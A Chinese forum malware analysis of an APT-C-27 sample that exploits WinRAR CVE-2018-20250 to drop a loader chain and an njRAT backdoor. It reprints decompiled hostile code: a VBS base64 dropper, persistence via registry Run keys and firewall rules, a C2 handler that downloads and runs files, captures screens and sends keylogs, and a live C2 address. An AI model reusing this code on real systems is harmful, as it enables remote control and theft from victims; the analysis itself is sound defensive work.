490694561 发表于 2019-8-2 18:58

APT-C-27(黄金鼠)攻击文档分析

本帖最后由 490694561 于 2019-8-9 18:07 编辑

# APT-C-27(黄金鼠)攻击文档分析

Date: Aug 02, 2019
Tags: 分析报告

# 0x00 文件信息

    样本MD5 : 314e8105f28530eb0bf54891b9b3ff69
    是个压缩文件

# 0x01 样本行为

从之前的分析报告中能够看到,它会在使用WinRAR解压的时候释放文件到某个特定的目录。利用的WinRAR漏洞为CVE-2018-20250,接下来先去了解下CVE-2018-20250。

---

从FreeBuf的文章中可以看到,用WinRAR打开文件(不是解压),能够看到文件里面包含了一个磁盘。

![](http://image.0xpoker.cn/markdown-img/rxbgq.png)

我这里打开之后也同样能看到一个磁盘,说明这确实是使用了CVE-2018-20250。

> 这里我好像遇到了一个问题,WinRAR的版本不对,于是搜了一下别人能复现成功的版本 WinRAR 5.60简体中文版

WinRAR链接:(https://www.rarlab.com/rar/winrar-x64-560sc.exe)

---

这时候就已经CVE触发成功了,能看到向启动菜单释放了一个文件Telegram Desktop.exe,而且看图标,应该是.Net程序。

![](http://image.0xpoker.cn/markdown-img/8qtqm.png)

所以把这个文件从沙箱中脱出来分析。

# 释放文件分析

现在能看到,这个程序Main函数

![](http://image.0xpoker.cn/markdown-img/uaton.png)

主要是一个启动器,为了启动Form1,那么接下来就去分析一下Form1

![](http://image.0xpoker.cn/markdown-img/t3x4i.png)

---

![](http://image.0xpoker.cn/markdown-img/om2oy.png)

![](http://image.0xpoker.cn/markdown-img/vfs8m.png)

Form1的构建函数就会初始化一些变量,我们用Python解一下看看这些变量是什么。

```python
dx1 = '4321'.replace('4', 'L').replace('3', 'o').replace('2', 'a').replace('1', 'd')
dx2 = "98765438".replace("9", "E").replace("8", "nt").replace("7", "r").replace("6", "y").replace("5", "P").replace("4", "o").replace("3", "i")
dx3 = "123456".replace("1", "I").replace("2", "n").replace("3", "v").replace("4", "o").replace("5", "k").replace("6", "e")
ex1 = "[%79]".replace("7", "0").replace("9", "1").replace("%", "^")
ex2 = ""
print dx1
print dx2
print dx3
print ex1
/*
Load
EntryPoint
Invoke
[^01]
*/
```

接下来,在Form1_Load中,如下图,先从资源中写出一个vbs脚本,然后运行该脚本并等待17秒,估计是等待脚本运行完成。

![](http://image.0xpoker.cn/markdown-img/php7m.png)

那么我们去将.Net程序的资源文件dump下来,vbs脚本代码如下图:

```vbscript
dim tx1 , tx2 , tx3 , tx4 , tx5 , tx6 , tx7 , tx8 , tx9

tx1 = "wscript.shell"
tx2 = "C:\Windows\debug\WIA"
tx3 = "Msxml2.DOMDocument.3.0"
tx4 = "base64"
tx5 = "ADODB.Stream"
tx6 = "bin.base64"
tx7 = "\Process.exe"
tx8 = "\Process.exe"
tx9 = "

set g = createobject(tx1)
h = g.ExpandEnvironmentStrings(tx2)

Set a = CreateObject(tx3).CreateElement(tx4)
a.dataType = tx6
a.text = tx9
Set s = CreateObject(tx5)
s.Type = 1

s.Open

s.Write a.nodeTypedValue

s.SaveToFile h & tx7,2
// =======注释=======
' wscript.sleep(%sleep%000)
// =================
g.run(h & tx8)

// 后面这一块应该没有用
'vbs
Function RepBase64(x)
    x = Replace(x, "AAAA", "升")
    RepBase64 =x
End Function
// =================
```

> 虽然我不咋会VBS不过从中大概看出的逻辑是
>
> **创建对象-设置运行环境然后创建行对象-设置内容格式为base64-然后写入对象-保存为文件-运行**

---

接下来就去将这个Process.exe弄出来看一下是什么如下图,可以看到应该又是一个.Net程序。

![](http://image.0xpoker.cn/markdown-img/zofom.png)

![](http://image.0xpoker.cn/markdown-img/2qgfj.png)

可以看到如上图,程序的Main又是去运行Form1,所以依然去Form1看代码。

---

在Form1的构建函数中依然是初始化了一些变量

![](http://image.0xpoker.cn/markdown-img/egh9a.png)

能看到Form1_Load的代码就是取创建这个1717.txt的

![](http://image.0xpoker.cn/markdown-img/v2wg8.png)

> 大致就是判断文件是否存在,如果存在就删除重新创建,如果不存在就直接创建

---

接下来需要知道创建的文件被写入了什么内容。

这里的str函数是自己写的,肯定有问题,先去看一下能看到是拼接资源文件中的字符串

![](http://image.0xpoker.cn/markdown-img/aye2e.png)

所以需要先把这9个文件拼接在一起成为1717.txt

---

> 这里有个小问题,直接从dnspy中导出时总会在文件前面多3个字符,不清楚为啥

```python
tmp_data = ''
for i in xrange(9):
        with open('1717_dumpfile/_%d' % (i + 1), 'rb') as f:
                tmp_data += f.read()
with open('1717.txt', 'wb') as f:
        f.write(tmp_data)
```

这样就能得到1717.txt的文件了,并且程序到这里也就运行完了

---

![](http://image.0xpoker.cn/markdown-img/y42rd.png)

继续看执行流程,能看到在sleep的时间过后就会读取1717.txt并且通过自己的函数RepBase64函数还原数据然后初始化一个字符串,RepBase64函数如下图,都使用Python脚本还原一下

![](http://image.0xpoker.cn/markdown-img/ttjtf.png)

```python
# -*- coding:utf-8 -*-
with open('1717.txt', 'rb') as f:
        tmpdata = f.read()

def RepBase64(x):
        x = x.replace("升", "AAAA")
        x = x.replace("丁", "B")
        x = x.replace("읍", "C")
        x = x.replace("알", "D")
        x = x.replace("앞", "E")
        x = x.replace("巨", "F")
        x = x.replace("얘", "G")
        x = x.replace("下", "H")
        x = x.replace("ᄍ", "I")
        x = x.replace("工", "J")
        x = x.replace("ᄊ", "K")
        x = x.replace("三", "L")
        x = x.replace("ᄈ", "M")
        x = x.replace("水", "N")
        x = x.replace("응", "O")
        x = x.replace("心", "P")
        x = x.replace("앙", "Q")
        x = x.replace("冊", "R")
        x = x.replace("음", "S")
        x = x.replace("內", "T")
        x = x.replace("ד", "U")
        x = x.replace("官", "V")
        x = x.replace("악", "W")
        x = x.replace("匹", "X")
        x = x.replace("안", "Y")
        x = x.replace("力", "Z")
        x = x.replace("月", "a")
        x = x.replace("을", "b")
        x = x.replace("ސ", "c")
        x = x.replace("임", "d")
        x = x.replace("戶", "e")
        x = x.replace("잎", "f")
        x = x.replace("已", "g")
        x = x.replace("율", "h")
        x = x.replace("尺", "i")
        x = x.replace("월", "j")
        x = x.replace("弓", "k")
        x = x.replace("원", "l")
        x = x.replace("七", "m")
        x = x.replace("웅", "n")
        x = x.replace("臼", "o")
        x = x.replace("울", "p")
        x = x.replace("人", "q")
        x = x.replace("운", "r")
        x = x.replace("山", "s")
        x = x.replace("옴", "t")
        x = x.replace("父", "u")
        x = x.replace("왕", "v")
        x = x.replace("了", "w")
        x = x.replace("왜", "x")
        x = x.replace("乙", "y")
        x = x.replace("에", "z")
        return x

if __name__ == '__main__':
        aaa = RepBase64(tmpdata)
        print aaa
        text2 = "!#$%^ase*|St#ing".replace("!", "F").replace("#", "r").replace("$", "o").replace("%", "m").replace("^", "B").replace("*", "6").replace("|", "4")
        print text2
```

> 生成的这个程序应该就是njRAT后门程序了,但是我没从代码中看出来他是怎么运行的,估计还得仔细看一下

---

    this.zd1 = Thread.GetDomain();
    this.zd2 = CallType.Method;
    this.zd3 = CallType.Get;
    this.zd4 = null;

上面备份了4个变量,他们将在如下图所示的流程中使用

![](http://image.0xpoker.cn/markdown-img/xraom.png)

在 **byte[] v = this.ccc(...)** 前包含这一行主要进行的就是将 **y** 哪里的Base64代码转化为byte数组存在变量

**objectValue3**那里是通过隐式调用**Load**载入**y**的后门程序字节码,返回对象。

**objectValue4**那里是通过隐式调用**EntryPoint**应该是**获得**程序入口点。

**objectValue5**那里是通过隐式调用**Invoke**来从**EntryPoint**开始运行程序。

之后程序就被运行起来了,这个程序的作用就没那么大了。

---

然后转而去分析新生成的njRAT后门程序。

![](http://image.0xpoker.cn/markdown-img/d3npj.png)

可以看到这还是一个.Net程序,同时我们还能看到很多需要用到的参数在OK类里,如下图

![](http://image.0xpoker.cn/markdown-img/nbqiy.png)

![](http://image.0xpoker.cn/markdown-img/k0lnv.png)

在运行一开始的时候就会先去调用OK类的ko方法

> 程序代码较长,直接放代码上来

```vb
**public static void ko()
{
        if (Interaction.Command() != null)
        {
                try
                {
                        OK.F.Registry.CurrentUser.SetValue("di", "!");
                }
                catch (Exception ex)
                {
                }
                Thread.Sleep(5000);
        }
        bool flag = false;
        OK.MT = new Mutex(true, OK.RG, ref flag);
        if (!flag)
        {
                ProjectData.EndApp();
        }
        OK.INS();
        if (!OK.Idr)
        {
                OK.EXE = OK.LO.Name;
                OK.DR = OK.LO.Directory.Name;
        }
        Thread thread = new Thread(new ThreadStart(OK.RC), 1);
        thread.Start();
        try
        {
                OK.kq = new kl();
                thread = new Thread(new ThreadStart(OK.kq.WRK), 1);
                thread.Start();
        }
        catch (Exception ex2)
        {
        }
        int num = 0;
        string left = "";
        if (OK.BD)
        {
                try
                {
                        SystemEvents.SessionEnding += delegate(object a0, SessionEndingEventArgs a1)
                        {
                                OK.ED();
                        };
                        OK.pr(1);
                }
                catch (Exception ex3)
                {
                }
        }
        checked
        {
                for (;;)
                {
                        Thread.Sleep(1000);
                        if (!OK.Cn)
                        {
                                left = "";
                        }
                        Application.DoEvents();
                        try
                        {
                                num++;
                                if (num == 5)
                                {
                                        try
                                        {
                                                Process.GetCurrentProcess().MinWorkingSet = (IntPtr)1024;
                                        }
                                        catch (Exception ex4)
                                        {
                                        }
                                }
                                if (num >= 8)
                                {
                                        num = 0;
                                        string text = OK.ACT();
                                        if (Operators.CompareString(left, text, false) != 0)
                                        {
                                                left = text;
                                                OK.Send("act" + OK.Y + text);
                                        }
                                }
                                if (OK.Isu)
                                {
                                        try
                                        {
                                                if (Operators.ConditionalCompareObjectNotEqual(OK.F.Registry.CurrentUser.GetValue(OK.sf + "\\" + OK.RG, ""), "\"" + OK.LO.FullName + "\" ..", false))
                                                {
                                                        OK.F.Registry.CurrentUser.OpenSubKey(OK.sf, true).SetValue(OK.RG, "\"" + OK.LO.FullName + "\" ..");
                                                }
                                        }
                                        catch (Exception ex5)
                                        {
                                        }
                                        try
                                        {
                                                if (Operators.ConditionalCompareObjectNotEqual(OK.F.Registry.LocalMachine.GetValue(OK.sf + "\\" + OK.RG, ""), "\"" + OK.LO.FullName + "\" ..", false))
                                                {
                                                        OK.F.Registry.LocalMachine.OpenSubKey(OK.sf, true).SetValue(OK.RG, "\"" + OK.LO.FullName + "\" ..");
                                                }
                                        }
                                        catch (Exception ex6)
                                        {
                                        }
                                }
                        }
                        catch (Exception ex7)
                        {
                        }
                }
        }
}**
```

从这里能看到首先被执行的函数是 **OK.INS()** 就目前而言前面两个判断都不会执行。

```vb
**public static void INS()
{
        Thread.Sleep(1000);
        if (OK.Idr)
        {
                if (!OK.CompDir(OK.LO, new FileInfo(Interaction.Environ(OK.DR).ToLower() + "\\" + OK.EXE.ToLower())))
                {
                        try
                        {
                                if (File.Exists(Interaction.Environ(OK.DR) + "\\" + OK.EXE))
                                {
                                        File.Delete(Interaction.Environ(OK.DR) + "\\" + OK.EXE);
                                }
                                FileStream fileStream = new FileStream(Interaction.Environ(OK.DR) + "\\" + OK.EXE, FileMode.CreateNew);
                                byte[] array = File.ReadAllBytes(OK.LO.FullName);
                                fileStream.Write(array, 0, array.Length);
                                fileStream.Flush();
                                fileStream.Close();
                                OK.LO = new FileInfo(Interaction.Environ(OK.DR) + "\\" + OK.EXE);
                                Process.Start(OK.LO.FullName);
                                ProjectData.EndApp();
                        }
                        catch (Exception ex)
                        {
                                ProjectData.EndApp();
                        }
                }
        }
        try
        {
                Environment.SetEnvironmentVariable("SEE_MASK_NOZONECHECKS", "1", EnvironmentVariableTarget.User);
        }
        catch (Exception ex2)
        {
        }
        try
        {
                Interaction.Shell(string.Concat(new string[]
                {
                        "Exceptiona firewall add allowedprogram \"",
                        OK.LO.FullName,
                        "\" \"",
                        OK.LO.Name,
                        "\" ENABLE"
                }), AppWinStyle.Hide, true, 5000);
        }
        catch (Exception ex3)
        {
        }
        if (OK.Isu)
        {
                try
                {
                        OK.F.Registry.CurrentUser.OpenSubKey(OK.sf, true).SetValue(OK.RG, "\"" + OK.LO.FullName + "\" ..");
                }
                catch (Exception ex4)
                {
                }
                try
                {
                        OK.F.Registry.LocalMachine.OpenSubKey(OK.sf, true).SetValue(OK.RG, "\"" + OK.LO.FullName + "\" ..");
                }
                catch (Exception ex5)
                {
                }
        }
        if (OK.IsF)
        {
                try
                {
                        File.Copy(OK.LO.FullName, Environment.GetFolderPath(Environment.SpecialFolder.Startup) + "\\" + OK.RG + ".exe", true);
                        OK.FS = new FileStream(Environment.GetFolderPath(Environment.SpecialFolder.Startup) + "\\" + OK.RG + ".exe", FileMode.Open);
                }
                catch (Exception ex6)
                {
                }
        }
}**
```

这样来看,一开始的if也是不成立的,一开始那个值为**false**,然后设置环境变量**SEE_MASK_NOZONECHECKS**

![](http://image.0xpoker.cn/markdown-img/o1y2p.png)

> 看网上这是关闭附件检查器的意思

然后添加防火墙白名单[应该是吧,我也看不那么懂,没用过这些命令]

![](http://image.0xpoker.cn/markdown-img/waayk.png)

这函数的后两个if都不会执行,所以回到主流程。

---

返回主流程后会新建两个现成分别是函数**OK.RC**和函数**OK.kq.WRK**,然后在函数**OK.RC**中能看到有调用connect方法。

在connect方法里面还有个Connect方法,Connect方法传入C&C服务器ip和port并且尝试建立连接。

> Server ip : 82.137.255.56
Server port : 1921

之后马上调用方法**OK.inf**用于获取系统的一些信息,并且调用**OK.Send**发送至服务器,然后会再次拼接一些系统相关信息[暂时还未分析],然后传回服务器

退回**OK.RC**函数,这时候就会进入一个大循环然后这个循环的主要功能是接收C&C服务器发来的Object[对,没看错,真的是.Net对象]然后拷贝到**OK.MeM**并且执行

![](http://image.0xpoker.cn/markdown-img/t3wwu.png)

---

进入OK.Ind函数,能看到

```vb
**public static void Ind(byte[] b)
{
        string[] array = Strings.Split(OK.BS(ref b), OK.Y, -1, CompareMethod.Binary);
        checked
        {
                try
                {
                        string left = array;
                        if (Operators.CompareString(left, "ll", false) == 0)
                        {
                                OK.Cn = false;
                        }
                        else if (Operators.CompareString(left, "kl", false) == 0)
                        {
                                OK.Send("kl" + OK.Y + OK.ENB(ref OK.kq.Logs));
                        }
                        else if (Operators.CompareString(left, "prof", false) == 0)
                        {
                                string left2 = array;
                                if (Operators.CompareString(left2, "~", false) == 0)
                                {
                                        OK.STV(array, array, RegistryValueKind.String);
                                }
                                else if (Operators.CompareString(left2, "!", false) == 0)
                                {
                                        OK.STV(array, array, RegistryValueKind.String);
                                        OK.Send(Conversions.ToString(Operators.ConcatenateObject("getvalue" + OK.Y + array + OK.Y, OK.GTV(array, ""))));
                                }
                                else if (Operators.CompareString(left2, "@", false) == 0)
                                {
                                        OK.DLV(array);
                                }
                        }
                        else
                        {
                                if (Operators.CompareString(left, "rn", false) == 0)
                                {
                                        byte[] bytes;
                                        if (array == '\u001f')
                                        {
                                                try
                                                {
                                                        MemoryStream memoryStream = new MemoryStream();
                                                        int length = (array + OK.Y + array + OK.Y).Length;
                                                        memoryStream.Write(b, length, b.Length - length);
                                                        bytes = OK.ZIP(memoryStream.ToArray());
                                                        goto IL_20B;
                                                }
                                                catch (Exception ex)
                                                {
                                                        OK.Send("MSG" + OK.Y + "Execute ERROR");
                                                        OK.Send("bla");
                                                        return;
                                                }
                                        }
                                        WebClient webClient = new WebClient();
                                        try
                                        {
                                                bytes = webClient.DownloadData(array);
                                        }
                                        catch (Exception ex2)
                                        {
                                                OK.Send("MSG" + OK.Y + "Download ERROR");
                                                OK.Send("bla");
                                                return;
                                        }
                                        IL_20B:
                                        OK.Send("bla");
                                        string text = Path.GetTempFileName() + "." + array;
                                        try
                                        {
                                                File.WriteAllBytes(text, bytes);
                                                Process.Start(text);
                                                OK.Send("MSG" + OK.Y + "Executed As " + new FileInfo(text).Name);
                                                return;
                                        }
                                        catch (Exception ex3)
                                        {
                                                OK.Send("MSG" + OK.Y + "Execute ERROR " + ex3.Message);
                                                return;
                                        }
                                }
                                if (Operators.CompareString(left, "inv", false) == 0)
                                {
                                        byte[] array2 = (byte[])OK.GTV(array, new byte);
                                        if (array.Length < 10 & array2.Length == 0)
                                        {
                                                OK.Send(string.Concat(new string[]
                                                {
                                                        "pl",
                                                        OK.Y,
                                                        array,
                                                        OK.Y,
                                                        Conversions.ToString(1)
                                                }));
                                        }
                                        else
                                        {
                                                if (array.Length > 10)
                                                {
                                                        MemoryStream memoryStream2 = new MemoryStream();
                                                        int length2 = string.Concat(new string[]
                                                        {
                                                                array,
                                                                OK.Y,
                                                                array,
                                                                OK.Y,
                                                                array,
                                                                OK.Y
                                                        }).Length;
                                                        memoryStream2.Write(b, length2, b.Length - length2);
                                                        array2 = OK.ZIP(memoryStream2.ToArray());
                                                        OK.STV(array, array2, RegistryValueKind.Binary);
                                                }
                                                OK.Send(string.Concat(new string[]
                                                {
                                                        "pl",
                                                        OK.Y,
                                                        array,
                                                        OK.Y,
                                                        Conversions.ToString(0)
                                                }));
                                                object objectValue = RuntimeHelpers.GetObjectValue(OK.Plugin(array2, "A"));
                                                NewLateBinding.LateSet(objectValue, null, "h", new object[]
                                                {
                                                        OK.H
                                                }, null, null);
                                                NewLateBinding.LateSet(objectValue, null, "p", new object[]
                                                {
                                                        OK.P
                                                }, null, null);
                                                NewLateBinding.LateSet(objectValue, null, "osk", new object[]
                                                {
                                                        array
                                                }, null, null);
                                                NewLateBinding.LateCall(objectValue, null, "start", new object, null, null, null, true);
                                                while (!Conversions.ToBoolean(Operators.OrObject(!OK.Cn, Operators.CompareObjectEqual(NewLateBinding.LateGet(objectValue, null, "Off", new object, null, null, null), true, false))))
                                                {
                                                        Thread.Sleep(1);
                                                }
                                                NewLateBinding.LateSet(objectValue, null, "off", new object[]
                                                {
                                                        true
                                                }, null, null);
                                        }
                                }
                                else if (Operators.CompareString(left, "ret", false) == 0)
                                {
                                        byte[] array3 = (byte[])OK.GTV(array, new byte);
                                        if (array.Length < 10 & array3.Length == 0)
                                        {
                                                OK.Send(string.Concat(new string[]
                                                {
                                                        "pl",
                                                        OK.Y,
                                                        array,
                                                        OK.Y,
                                                        Conversions.ToString(1)
                                                }));
                                        }
                                        else
                                        {
                                                if (array.Length > 10)
                                                {
                                                        MemoryStream memoryStream3 = new MemoryStream();
                                                        int length3 = (array + OK.Y + array + OK.Y).Length;
                                                        memoryStream3.Write(b, length3, b.Length - length3);
                                                        array3 = OK.ZIP(memoryStream3.ToArray());
                                                        OK.STV(array, array3, RegistryValueKind.Binary);
                                                }
                                                OK.Send(string.Concat(new string[]
                                                {
                                                        "pl",
                                                        OK.Y,
                                                        array,
                                                        OK.Y,
                                                        Conversions.ToString(0)
                                                }));
                                                object objectValue2 = RuntimeHelpers.GetObjectValue(OK.Plugin(array3, "A"));
                                                string[] array4 = new string;
                                                array4 = "ret";
                                                array4 = OK.Y;
                                                array4 = array;
                                                array4 = OK.Y;
                                                string[] array5 = array4;
                                                int num = 4;
                                                string text2 = Conversions.ToString(NewLateBinding.LateGet(objectValue2, null, "GT", new object, null, null, null));
                                                array5 = OK.ENB(ref text2);
                                                OK.Send(string.Concat(array4));
                                        }
                                }
                                else if (Operators.CompareString(left, "CAP", false) == 0)
                                {
                                        int width = Screen.PrimaryScreen.Bounds.Width;
                                        Rectangle bounds = Screen.PrimaryScreen.Bounds;
                                        Bitmap bitmap = new Bitmap(width, bounds.Height, PixelFormat.Format16bppRgb555);
                                        Graphics graphics = Graphics.FromImage(bitmap);
                                        Graphics graphics2 = graphics;
                                        int sourceX = 0;
                                        int sourceY = 0;
                                        int destinationX = 0;
                                        int destinationY = 0;
                                        Size size = new Size(bitmap.Width, bitmap.Height);
                                        graphics2.CopyFromScreen(sourceX, sourceY, destinationX, destinationY, size, CopyPixelOperation.SourceCopy);
                                        try
                                        {
                                                Cursor @default = Cursors.Default;
                                                Graphics g = graphics;
                                                Point position = Cursor.Position;
                                                size = new Size(32, 32);
                                                bounds = new Rectangle(position, size);
                                                @default.Draw(g, bounds);
                                        }
                                        catch (Exception ex4)
                                        {
                                        }
                                        graphics.Dispose();
                                        Bitmap bitmap2 = new Bitmap(Conversions.ToInteger(array), Conversions.ToInteger(array));
                                        graphics = Graphics.FromImage(bitmap2);
                                        graphics.DrawImage(bitmap, 0, 0, bitmap2.Width, bitmap2.Height);
                                        graphics.Dispose();
                                        MemoryStream memoryStream4 = new MemoryStream();
                                        string text2 = "CAP" + OK.Y;
                                        b = OK.SB(ref text2);
                                        memoryStream4.Write(b, 0, b.Length);
                                        MemoryStream memoryStream5 = new MemoryStream();
                                        bitmap2.Save(memoryStream5, ImageFormat.Jpeg);
                                        string left3 = OK.md5(memoryStream5.ToArray());
                                        if (Operators.CompareString(left3, OK.lastcap, false) != 0)
                                        {
                                                OK.lastcap = left3;
                                                memoryStream4.Write(memoryStream5.ToArray(), 0, (int)memoryStream5.Length);
                                        }
                                        else
                                        {
                                                memoryStream4.WriteByte(0);
                                        }
                                        OK.Sendb(memoryStream4.ToArray());
                                        memoryStream4.Dispose();
                                        memoryStream5.Dispose();
                                        bitmap.Dispose();
                                        bitmap2.Dispose();
                                }
                                else if (Operators.CompareString(left, "un", false) == 0)
                                {
                                        string left4 = array;
                                        if (Operators.CompareString(left4, "~", false) == 0)
                                        {
                                                OK.UNS();
                                        }
                                        else if (Operators.CompareString(left4, "!", false) == 0)
                                        {
                                                OK.pr(0);
                                                ProjectData.EndApp();
                                        }
                                        else if (Operators.CompareString(left4, "@", false) == 0)
                                        {
                                                OK.pr(0);
                                                Process.Start(OK.LO.FullName);
                                                ProjectData.EndApp();
                                        }
                                }
                                else if (Operators.CompareString(left, "up", false) == 0)
                                {
                                        byte[] bytes2 = null;
                                        if (array == '\u001f')
                                        {
                                                try
                                                {
                                                        MemoryStream memoryStream6 = new MemoryStream();
                                                        int length4 = (array + OK.Y).Length;
                                                        memoryStream6.Write(b, length4, b.Length - length4);
                                                        bytes2 = OK.ZIP(memoryStream6.ToArray());
                                                        goto IL_97B;
                                                }
                                                catch (Exception ex5)
                                                {
                                                        OK.Send("MSG" + OK.Y + "Update ERROR");
                                                        OK.Send("bla");
                                                        return;
                                                }
                                        }
                                        WebClient webClient2 = new WebClient();
                                        try
                                        {
                                                bytes2 = webClient2.DownloadData(array);
                                        }
                                        catch (Exception ex6)
                                        {
                                                OK.Send("MSG" + OK.Y + "Update ERROR");
                                                OK.Send("bla");
                                                return;
                                        }
                                        IL_97B:
                                        OK.Send("bla");
                                        string text3 = Path.GetTempFileName() + ".exe";
                                        try
                                        {
                                                OK.Send("MSG" + OK.Y + "Updating To " + new FileInfo(text3).Name);
                                                Thread.Sleep(2000);
                                                File.WriteAllBytes(text3, bytes2);
                                                Process.Start(text3, "..");
                                        }
                                        catch (Exception ex7)
                                        {
                                                OK.Send("MSG" + OK.Y + "Update ERROR " + ex7.Message);
                                                return;
                                        }
                                        OK.UNS();
                                }
                                else if (Operators.CompareString(left, "Ex", false) == 0)
                                {
                                        if (OK.PLG == null)
                                        {
                                                OK.Send("PLG");
                                                int num2 = 0;
                                                while (!(OK.PLG != null | num2 == 20 | !OK.Cn))
                                                {
                                                        num2++;
                                                        Thread.Sleep(1000);
                                                }
                                                if (OK.PLG == null | !OK.Cn)
                                                {
                                                        return;
                                                }
                                        }
                                        object plg = OK.PLG;
                                        Type type = null;
                                        string memberName = "ind";
                                        object[] array6 = new object[]
                                        {
                                                b
                                        };
                                        object[] arguments = array6;
                                        string[] argumentNames = null;
                                        Type[] typeArguments = null;
                                        bool[] array7 = new bool[]
                                        {
                                                true
                                        };
                                        NewLateBinding.LateCall(plg, type, memberName, arguments, argumentNames, typeArguments, array7, true);
                                        if (array7)
                                        {
                                                b = (byte[])Conversions.ChangeType(RuntimeHelpers.GetObjectValue(array6), typeof(byte[]));
                                        }
                                }
                                else if (Operators.CompareString(left, "PLG", false) == 0)
                                {
                                        MemoryStream memoryStream7 = new MemoryStream();
                                        int length5 = (array + OK.Y).Length;
                                        memoryStream7.Write(b, length5, b.Length - length5);
                                        OK.PLG = RuntimeHelpers.GetObjectValue(OK.Plugin(OK.ZIP(memoryStream7.ToArray()), "A"));
                                        NewLateBinding.LateSet(OK.PLG, null, "H", new object[]
                                        {
                                                OK.H
                                        }, null, null);
                                        NewLateBinding.LateSet(OK.PLG, null, "P", new object[]
                                        {
                                                OK.P
                                        }, null, null);
                                        NewLateBinding.LateSet(OK.PLG, null, "c", new object[]
                                        {
                                                OK.C
                                        }, null, null);
                                }
                        }
                }
                catch (Exception ex8)
                {
                        if (array.Length > 0 && (Operators.CompareString(array, "Ex", false) == 0 | Operators.CompareString(array, "PLG", false) == 0))
                        {
                                OK.PLG = null;
                        }
                        try
                        {
                                OK.Send(string.Concat(new string[]
                                {
                                        "ER",
                                        OK.Y,
                                        array,
                                        OK.Y,
                                        ex8.Message
                                }));
                        }
                        catch (Exception ex9)
                        {
                        }
                }
        }
}**
```

这里虽然长,不过稍微看几个if的case语句就能猜到这里就是发送消息的主函数,比如定时发送键盘记录[多的就自己去看一下吧,也没那么复杂]

![](http://image.0xpoker.cn/markdown-img/v0ddl.png)

---

然后继续退回到主函数**ok**,往下看到创建线程,函数为**OK.kq.WRK**

该函数主要为键盘记录

> 但是我没法理解他为啥不用事件去做键盘记录而是使用循环判断,这样不会导致计算机资源占用较大吗

![](http://image.0xpoker.cn/markdown-img/7oc5j.png)

函数大概内容就是一个大循环每**1000次**调用一下**OK.STV**,然后里面的**do...while**是用于判断按键的,这里套用一下百度百科的说法

![](http://image.0xpoker.cn/markdown-img/t6pyu.png)

所以相当于遍历所有键,判断当前用户按的是哪个键。

---

进入函数**OK.STV**能看到这是个写注册表的函数

![](http://image.0xpoker.cn/markdown-img/syuis.png)

在某个特定的路径下创建键值对,而且在上层函数中能够看到存的键值名称固定为****,然后往注册表中存入键盘记录信息,信息大小为**20 * 1024**,如果超过这个长度就会切掉前面多余的部分留下最新的。

---

放一张后门程序函数图

![](http://image.0xpoker.cn/markdown-img/49ujo.png)

# 总结
该njRAT远控还具有远程SHELL、插件下载执行、远程桌面、文件管理等多个功能,我太菜了,就不一一解释了。

tfrist 发表于 2020-2-13 03:45

不错不错分析的很到位!

请问一下 你最后的 程序函数图 是用什么软件生成的? 可否说一下?看着挺专业的

Donepojie 发表于 2021-5-10 15:12

tfrist 发表于 2020-2-13 03:45
不错不错分析的很到位!

请问一下 你最后的 程序函数图 是用什么软件生成的? 可否说一下?看着挺专业 ...

看着像xmind

ddddddddbl 发表于 2019-8-2 22:24

太厉害了这个!

道极承天 发表于 2019-8-3 08:58

{:1_899:}学习了学习了

SANSKRIT 发表于 2019-8-4 01:53

牛牛牛!

jldwda8 发表于 2019-10-20 20:14

学习了,攻击文档分析,大神

ly765893958 发表于 2019-10-22 09:12

学习了 感谢大佬{:301_993:}

michaelinfinity 发表于 2019-11-25 23:03

请问大佬这个有样本可以下载吗,想自己试着调试一下{:1_905:}

jihuifu 发表于 2019-11-26 13:53

看到最后楼主自谦说自己太菜了,我忍不住汪的一声就哭了出来。

490694561 发表于 2020-2-25 21:47

tfrist 发表于 2020-2-13 03:45
不错不错分析的很到位!

请问一下 你最后的 程序函数图 是用什么软件生成的? 可否说一下?看着挺专业 ...

手动整理的
页: [1] 2
查看完整版本: APT-C-27(黄金鼠)攻击文档分析